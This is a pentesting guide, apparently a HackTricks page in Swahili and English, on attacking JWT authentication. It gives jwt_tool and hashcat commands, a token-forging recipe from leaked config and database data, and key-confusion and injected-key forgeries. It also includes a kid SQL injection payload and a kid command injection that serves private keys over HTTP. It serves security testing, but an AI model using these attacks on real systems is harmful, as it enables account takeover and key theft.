Udhaifu za JWT (Json Web Tokens)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Sehemu ya chapisho hili inatokana na chapisho nzuri: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
Mwandishi wa zana nzuri ya pentest ya JWTs https://github.com/ticarpi/jwt_tool

Mafanikio ya Haraka

Endesha jwt_tool kwa mode All Tests! na subiri mistari za kijani

python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"

Kama una bahati, zana itapata kesi ambapo programu ya wavuti inakagua JWT kwa njia isiyo sahihi:

Kisha, unaweza kutafuta request kwenye proxy yako au dump JWT iliyotumika kwa request hiyo ukitumia jwt_ tool:

python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"

You can also use the Burp Extension SignSaboteur to launch JWT attacks from Burp.

Practical JWT assessment workflow

  • Tambua udhibiti wa kikao: Chagua ombi linalohusiana na mtumiaji (mfano, wasifu, malipo). Ondoa cookies/headers mmoja mmoja hadi ombi lirudishwe kinagaubaga ili kutambua ni token gani zinazoamua idhini.
  • Tafuta JWTs kwenye traffic: Mara nyingi ziko katika Authorization: Bearer <JWT>, lakini pia zinaonekana katika custom headers au cookies. Ikiwa Burp haizionyeshi, tumia Target → Site map → Engagement tools → Search na regex patterns kama:
  • [= ]eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9._-]*
  • eyJ[a-zA-Z0-9_-]+?\.[a-zA-Z0-9_-]+?\.[a-zA-Z0-9_-]+
  • [= ]eyJ[A-Za-z0-9_\\/+-]*\.[A-Za-z0-9._\\/+-]*
  • Decode and enumerate: Tumia Burp JWT Editor au python3 jwt_tool.py <JWT> kusoma header/payload. Kumbuka alg, exp/token lifetime, na authn/authz-driving claims (role, id, username, email, etc.).
  • Signature enforcement sanity check: Badilisha au futa bytes chache katika sehemu ya signature kisha replay. Kukubaliwa kunamaanisha hakuna verification ya signature na unaweza kubadilisha payload claims moja kwa moja.
  • Lengo: Badilisha payload claims ili kuongeza privileges; kila shambulio hapa chini lina lengo la kufanya server ikubali payload iliyofanywa udanganyifu kwa kutumia verification dhaifu, siri dhaifu, au uteuzi usio salama wa key.

Tamper data without modifying anything

Unaweza kubadilisha data huku ukiacha saini kama ilivyo na ukague ikiwa server inakagua saini. Jaribu kubadilisha username yako kuwa “admin” kwa mfano.

Je, token inakaguliwa?

Ili kukagua ikiwa signature ya JWT inathibitishwa:

  • Ujumbe wa kosa unaonyesha kuwa verification inaendelea; maelezo nyeti katika makosa yenye ufafanuzi mkubwa yanapaswa kuangaliwa.
  • Mabadiliko kwenye ukurasa unaorudishwa pia yanaonyesha verification.
  • Hakuna mabadiliko kunapendekeza hakuna verification; hapa ndipo pa kujaribu kubadilisha payload claims.

Chanzo

Ni muhimu kubaini kama token ilitengenezwa upande wa seva au upande wa mteja kwa kuchunguza historia ya maombi ya proxy.

  • Token ambazo mara ya kwanza zilionekana kutoka client-side zinaonyesha key inaweza kuwa imefunuliwa kwa code ya client, na inahitaji uchunguzi zaidi.
  • Token zinazotokana server-side zinaonyesha mchakato salama.

Muda

Angalia ikiwa token inadumu zaidi ya 24h… labda haiwezi kuisha kabisa. Ikiwa kuna field ya “exp”, hakikisha server inaisimamia ipasavyo.

Brute-force HMAC secret

See this page.

If the header uses HS256, dump the token to a file and try offline cracking:

python3 jwt_tool.py <JWT> -C -d wordlist.txt
hashcat -a 0 -m 16500 jwt.txt /path/to/wordlist.txt -r /usr/share/hashcat/rules/best64.rule

Mara siri inapopatikana, iweke kama funguo simetriki katika Burp JWT Editor na usaini tena claims zilizobadilishwa.

Pata JWT secrets kutoka leaked config + DB data

Ikiwa kusoma faili yoyote (au backup leak) inafichua pamoja application encryption material na user records, unaweza wakati mwingine kuunda tena JWT signing secret na kutengeneza session cookies bila kujua nywila za plaintext. Mfano wa muundo uliotambuliwa katika workflow automation stacks:

  1. Leak the app key (e.g., encryptionKey) from a config file.
  2. Leak the user table to obtain email, password_hash, and user_id.
  3. Derive the signing secret from the key, then derive the per-user hash expected in the JWT payload:
jwt_secret = sha256(encryption_key[::2]).hexdigest()              # signing key
jwt_hash = b64encode(sha256(f"{email}:{password_hash}")).decode()[:10]
token = jwt.encode({"id": user_id, "hash": jwt_hash}, jwt_secret, "HS256")
  1. Drop the signed token into the session cookie (e.g., n8n-auth) ili kuiga user/admin account hata kama password hash imekuwa salted.

Modify the algorithm to None

Weka algorithm inayotumika kuwa “None” na ondoa signature part.

Tumia Burp extension inayoitwa “JSON Web Token” kujaribu hitilafu hii na kubadilisha thamani mbalimbali ndani ya JWT (tuma request kwa Repeater na kwenye tab ya “JSON Web Token” unaweza kurekebisha thamani za token. Unaweza pia kuchagua kuweka thamani ya “Alg” field kuwa “None”).

Change the algorithm RS256(asymmetric) to HS256(symmetric) (CVE-2016-5431/CVE-2016-10555)

Algorithm HS256 inatumia secret key kusign na kuthibitisha kila message.
Algorithm RS256 inatumia private key kusign message na inatumia public key kwa authentication.

Ikiwa utabadilisha algorithm kutoka RS256 hadi HS256, backend code itatumia public key kama secret key kisha itatumia algorithm ya HS256 kuthibitisha signature.

Kisha, kwa kutumia public key na kubadilisha RS256 kuwa HS256 tunaweza kuunda valid signature. Unaweza retrieve certificate ya web server kwa kutekeleza hili:

openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem #For this attack you can use the JOSEPH Burp extension. In the Repeater, select the JWS tab and select the Key confusion attack. Load the PEM, Update the request and send it. (This extension allows you to send the "non" algorithm attack also). It is also recommended to use the tool jwt_tool with the option 2 as the previous Burp Extension does not always works well.
openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem

Using Burp JWT Editor, import the RSA public key (from /.well-known/jwks.json or a PEM) and run Attack → HMAC Key Confusion Attack to automate the HS256 re-sign attempt.

Funguo mpya ya umma ndani ya header

Mshambulizi anaweka funguo mpya ndani ya header ya token na serveri inatumia funguo hii mpya kuthibitisha saini (CVE-2018-0114).

Hii inaweza kufanywa kwa kutumia extension ya Burp “JSON Web Tokens”.
(Send the request to the Repeater, inside the JSON Web Token tab select “CVE-2018-0114” and send the request).

JWKS Spoofing

Maelekezo yanaelezea mbinu ya kutathmini usalama wa JWT tokens, hasa zile zinazotumia dai la header “jku”. Dai hili linapaswa kuunganisha kwenye faili ya JWKS (JSON Web Key Set) inayobeba funguo ya umma inayohitajika kwa ajili ya uthibitisho wa token.

  • Kutathmini Tokens zilizo na header ya “jku”:

  • Thibitisha URL ya dai la “jku” ili kuhakikisha inaelekeza kwa JWKS file sahihi.

  • Badilisha thamani ya “jku” ya token ili kuipeleka kwa web service unayodhibiti, kuruhusu uchunguzi wa trafiki.

  • Kufuatilia mwingiliano wa HTTP:

  • Kuuona maombi ya HTTP kwa URL uliyobainisha kunaonyesha jitihada za serveri kuleta funguo kutoka kwenye link uliyotoa.

  • Unapotumia jwt_tool kwa mchakato huu, ni muhimu kusasisha faili jwtconf.ini na eneo lako la JWKS ili kurahisisha upimaji.

  • Amri kwa jwt_tool:

  • Execute the following command to simulate the scenario with jwt_tool:

python3 jwt_tool.py JWT_HERE -X s

Muhtasari wa Masuala ya kid

Dai la header la hiari linalojulikana kama kid linatumiwa kutambua funguo maalum, jambo lenye umuhimu hasa katika mazingira ambapo kuna funguo nyingi kwa ajili ya uthibitisho wa saini ya token. Dai hili husaidia kuchagua funguo inayofaa kuthibitisha saini ya token.

Kufichua Funguo kupitia kid

Wakati dai la kid likipo katika header, inashauriwa kutafuta katika directory ya webi faili inayolingana au tofauti zake. Kwa mfano, ikiwa "kid":"key/12345" imeainishwa, faili /key/12345 na /key/12345.pem zinapaswa kutafutwa katika web root.

Path Traversal na kid

Dai la kid pia linaweza kutumiwa kusogea kupitia file system, na hivyo kuruhusu uchaguzi wa faili lolote. Inawezekana kujaribu uunganisho au kutekeleza mashambulizi ya Server-Side Request Forgery (SSRF) kwa kubadilisha thamani ya kid ili kulenga faili au huduma maalum. Kubadilisha JWT ili kubadilisha thamani ya kid huku saini ya awali ikiendelea kunaweza kufanikiwa kwa kutumia bendera -T katika jwt_tool, kama inavyoonyeshwa hapa chini:

python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""

Kwa kulenga faili zenye yaliyomo yanayoweza kutabirika, inawezekana kuforge JWT halali. Kwa mfano, faili /proc/sys/kernel/randomize_va_space kwenye mifumo ya Linux, inayojulikana kuwa na thamani 2, inaweza kutumika katika parameter ya kid kwa kutumia 2 kama nywila ya symmetric kwa uzalishaji wa JWT.

Mfano wa vitendo kwa ajili ya utunzaji dhaifu wa funguo kutoka kwenye file-system ni kuzalisha funguo ya HS256 na JWK k imewekwa kuwa AA==, kuweka kid kwenye traversal kama ../../../../../../../dev/null, kisha kusaini tena—utekelezaji fulani huchukulia faili tupu kama siri halali ya HMAC na watakubali tokeni zilizofanywa uongo.

SQL Injection via “kid”

Ikiwa yaliyomo ya dai la kid yanatumika kuchukua nywila kutoka kwenye database, SQL injection inaweza kurahisishwa kwa kubadilisha payload ya kid. Mfano wa payload unaotumia SQL injection kubadilisha mchakato wa kusaini JWT ni:

non-existent-index' UNION SELECT 'ATTACKER';-- -

Marekebisho haya yanawalazimisha kutumia funguo inayojulikana ya siri, ATTACKER, kwa kusaini JWT.

OS Injection through “kid”

Senario ambapo parameter ya kid inaelekeza path ya faili inayotumika ndani ya muktadha wa utekelezaji wa amri inaweza kusababisha udhaifu wa Remote Code Execution (RCE). Kwa kuingiza amri ndani ya parameter ya kid, inawezekana kufichua private keys. Mfano wa payload kwa kufanikisha RCE na kufichua funguo ni:

/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&

x5u and jku

jku

jku stands for JWK Set URL.
If the token uses a “jkuHeader claim then check out the provided URL. Hii inapaswa kuelekeza kwenye URL inayobeba faili ya JWKS ambayo ina Public Key ya kuthibitisha token. Badilisha token ili kuelekeza thamani ya jku kwenye web service unayoweza kufuatilia trafiki yake.

First you need to create a new certificate with new private & public keys

openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key

Kisha unaweza kutumia kwa mfano jwt.io kutengeneza JWT mpya kwa kutumia funguo za umma na za kibinafsi zilizotengenezwa na kuonyesha parameter jku kwa cheti kilichotengenezwa. Ili kuunda cheti halali cha jku unaweza kupakua cheti asili na kubadilisha vigezo vinavyohitajika.

Unaweza kupata parameta “e” na “n” kutoka kwa cheti ya umma kwa kutumia:

from Crypto.PublicKey import RSA
fp = open("publickey.crt", "r")
key = RSA.importKey(fp.read())
fp.close()
print("n:", hex(key.n))
print("e:", hex(key.e))

If the verifier fetches key material remotely, embed a Burp Collaborator URL in jku/x5u using JWT Editor → Attack → Embed Collaborator payload. Any callback confirms SSRF-style key retrieval; then host your own JWKS/PEM at that URL and re-sign with your private key so the service validates attacker-minted tokens.

x5u

X.509 URL. A URI pointing to a set of X.509 (a certificate format standard) public certificates encoded in PEM form. The first certificate in the set must be the one used to sign this JWT. The subsequent certificates each sign the previous one, thus completing the certificate chain. X.509 is defined in RFC 52807 . Transport security is required to transfer the certificates.

Try to change this header to an URL under your control and check if any request is received. In that case you could tamper the JWT.

To forge a new token using a certificate controlled by you, you need to create the certificate and extract the public and private keys:

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out attacker.crt
openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem

Kisha unaweza kutumia kwa mfano jwt.io kuunda JWT mpya na funguo za umma na za kibinafsi zilizotengenezwa na kuonyesha parameter x5u kwa cheti .crt kilichotengenezwa.

Unaweza pia kutumia vibaya zote hizi vulns kwa SSRFs.

x5c

Parameter hii inaweza kuwa na cheti kwa base64:

Ikiwa mshambuliaji atanakili cheti kilichojisainishwa na kuunda tokeni bandia akitumia private key inayolingana na kubadilisha thamani ya parameter “x5c” na cheti kipya kilichotengenezwa na kurekebisha vigezo vingine, yaani n, e na x5t, basi kwa msingi huo tokeni bandia itakubalika na server.

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
openssl x509 -in attacker.crt -text

Public Key iliyojumuishwa (CVE-2018-0114)

Ikiwa JWT ina public key iliyojumuishwa kama katika tukio lifuatalo:

Kutumia script ya nodejs ifuatayo inawezekana kuunda public key kutokana na data hiyo:

const NodeRSA = require('node-rsa');
const fs = require('fs');
n ="​ANQ3hoFoDxGQMhYOAc6CHmzz6_Z20hiP1Nvl1IN6phLwBj5gLei3e4e-DDmdwQ1zOueacCun0DkX1gMtTTX36jR8CnoBRBUTmNsQ7zaL3jIU4iXeYGuy7WPZ_TQEuAO1ogVQudn2zTXEiQeh-58tuPeTVpKmqZdS3Mpum3l72GHBbqggo_1h3cyvW4j3QM49YbV35aHV3WbwZJXPzWcDoEnCM4EwnqJiKeSpxvaClxQ5nQo3h2WdnV03C5WuLWaBNhDfC_HItdcaZ3pjImAjo4jkkej6mW3eXqtmDX39uZUyvwBzreMWh6uOu9W0DMdGBbfNNWcaR5tSZEGGj2divE8"​;
e = "AQAB";
const key = new NodeRSA();
var importedKey = key.importKey({n: Buffer.from(n, 'base64'),e: Buffer.from(e, 'base64'),}, 'components-public');
console.log(importedKey.exportKey("public"));

Inawezekana kuunda private/public key mpya, kuingiza public key mpya ndani ya token na kuitumia kutengeneza signature mpya:

openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key

Unaweza kupata “n” na “e” kwa kutumia script hii ya nodejs:

const NodeRSA = require('node-rsa');
const fs = require('fs');
keyPair = fs.readFileSync("keypair.pem");
const key = new NodeRSA(keyPair);
const publicComponents = key.exportKey('components-public');
console.log('Parameter n: ', publicComponents.n.toString("hex"));
console.log('Parameter e: ', publicComponents.e.toString(16));

Finally, using the public and private key and the new “n” and “e” values you can use jwt.io to forge a new valid JWT with any information.

ES256: Revealing the private key with same nonce

Ikiwa baadhi ya maombi yanatumia ES256 na yanatumia nonce ile ile kuunda JWTs mbili, private key inaweza kurejeshwa.

Here is a example: ECDSA: Revealing the private key, if same nonce used (with SECP256k1)

JTI (JWT ID)

Dai la JTI (JWT ID) hutoa kitambulisho cha kipekee kwa JWT Token. Inaweza kutumika kuzuia Token ku-replay.
Hata hivyo, fikiria hali ambapo urefu wa juu wa ID ni 4 (0001-9999). Ombi 0001 na 10001 zitatumia ID ile ile. Kwa hivyo ikiwa backend inaongeza ID kwa kila ombi, unaweza kuudanganya huu ili replay a request (inahitaji kutuma maombi 10000 kati ya kila replay iliyofanikiwa).

JWT Registered claims

JSON Web Token (JWT)

Mashambulizi mengine

Cross-service Relay Attacks

Imebainika kuwa baadhi ya web applications hutegemea JWT service inayotumika kwa uaminifu kwa ajili ya utengenezaji na usimamizi wa tokens zao. Kuna matukio yaliyoripotiwa ambapo token iliyotengenezwa kwa mteja mmoja na JWT service, ilikubaliwa na mteja mwingine wa JWT service hiyo hiyo. Ikiwa kutolewa au upya wa JWT kupitia third-party service kutatambulika, inapaswa kuchunguzwa uwezekano wa kujisajili akaunti kwenye mteja mwingine wa service hiyo kwa kutumia username/email ile ile. Kisha inapaswa kujaribiwa ku-replay token iliyopatikana katika ombi kwa target ili kuona kama inakubaliwa.

  • Kukubaliwa kwa token yako kunaweza kuashiria tatizo muhimu, kiasi kinachoweza kuruhusu spoofing ya akaunti ya mtumiaji yeyote. Hata hivyo, inapaswa kutambuliwa kuwa ruhusa kwa majaribio ya kina inaweza kuhitajika ikiwa unajiandikisha kwenye third-party application, kwani hii inaweza kuingia katika eneo la kisheria lenye ukungu.

Expiry Check of Tokens

Token’s expiry huhakikiwa kwa kutumia “exp” Payload claim. Kwa kuwa JWTs mara nyingi hutumika bila taarifa za session, inahitajika utunzaji wa tahadhari. Katika matukio mengi, kukamata na ku-replay JWT ya mtumiaji mwingine kunaweza kuwezesha impersonation ya mtumiaji huyo. JWT RFC inapendekeza kupunguza JWT replay attacks kwa kutumia “exp” claim kuweka muda wa kumalizika kwa token. Zaidi ya hayo, utekelezaji wa ukaguzi unaofaa na application kuhakikisha inachakata thamani hii na kukataa tokens zilizopita muda ni muhimu. Ikiwa token inajumuisha “exp” claim na mipaka ya muda ya majaribio inaruhusu, inashauriwa kuhifadhi token na kuireplay baada ya muda wa kumalizika kupita. Yoyote ya ndani ya token, ikiwa ni pamoja na timestamp parsing na expiry checking (timestamp in UTC), inaweza kusomwa kwa kutumia jwt_tool’s -R flag.

  • Hatari ya usalama inaweza kuwepo ikiwa application bado inathibitisha token, kwani inaweza kupendekeza kuwa token haiwezi kamwe kumalizika.

Vifaa

  • jwt_tool – kuchanganua, kuharibu claim/header, offline secret cracking (-C) na modi za mashambulizi nusu-otomati (-M at).
  • Burp JWT Editor – decode/re-sign in Repeater, generate custom keys, and run built-in attacks (none, HMAC key confusion, embedded JWK, jku/x5u collaborator payloads).
  • hashcat -m 16500 – kutia nguvu kwa GPU kwa kuvunja siri za HS256 baada ya kuhamisha JWTs kwenye wordlist.

GitHub - ticarpi/jwt_tool: :snake: A toolkit for testing, tweaking and cracking JSON Web Tokens \xc2\xb7 GitHub

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks